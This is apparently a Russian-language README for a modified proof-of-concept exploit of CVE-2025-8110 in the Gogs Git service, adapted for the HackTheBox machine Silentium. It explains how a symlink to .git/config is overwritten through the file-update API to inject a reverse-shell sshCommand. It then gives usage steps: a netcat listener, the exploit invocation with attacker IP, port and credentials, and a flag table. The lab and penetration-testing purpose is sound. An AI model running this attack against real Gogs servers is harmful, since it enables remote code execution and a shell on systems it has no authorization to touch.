
Эксплойт Gogs service и получение root-пользователя
Предупреждение: Этот инструмент предназначен строго для образовательных целей и авторизованного тестирования на проникновение. Используйте его только против систем, на тестирование которых у вас есть явное разрешение.
Это модифицированная версия zAbuQasem/gogs-CVE-2025-8110, адаптированная для работы с машиной Silentium на HackTheBox. Оригинальный PoC требовал корректировок для обработки специфической конфигурации Gogs и процесса аутентификации Silentium.
CVE-2025-8110 — это уязвимость удаленного выполнения кода в Gogs, самостоятельно размещаемом Git-сервисе.
API-эндпоинт обновления файлов Gogs (PUT /api/v1/repos/.../contents/<file>) не проверяет, является ли целевой файл символической ссылкой. Аутентифицированный злоумышленник может поместить символическую ссылку в репозиторий, указывающую на .git/config, а затем с помощью API перезаписать её вредоносной полезной нагрузкой. Полезная нагрузка внедряет пользовательскую команду sshCommand в конфигурацию git, которую Gogs выполняет на стороне сервера при следующей SSH-операции с этим репозиторием, что приводит к удаленному выполнению кода.
malicious_link -> .git/config) и отправляет её..git/config, содержащий sshCommand = <reverse shell>..git/config, запуская оболочку при следующей SSH-операции.Установка зависимостей:
pip install -r requirements.txt
Запуск слушателя:
nc -lvnp <PORT>
Запуск эксплойта:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
Опционально — маршрутизация через Burp Suite:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| Флаг | Описание |
|---|---|
-u | Базовый URL Gogs |
-lh | Ваш IP атакующего (хост обратной оболочки) |
-lp | Ваш порт слушателя |
-un | Ваше зарегистрированное имя пользователя Gogs |
-pw | Ваш пароль Gogs |
-x | (Опционально) Маршрутизация трафика через Burp на localhost:8080 |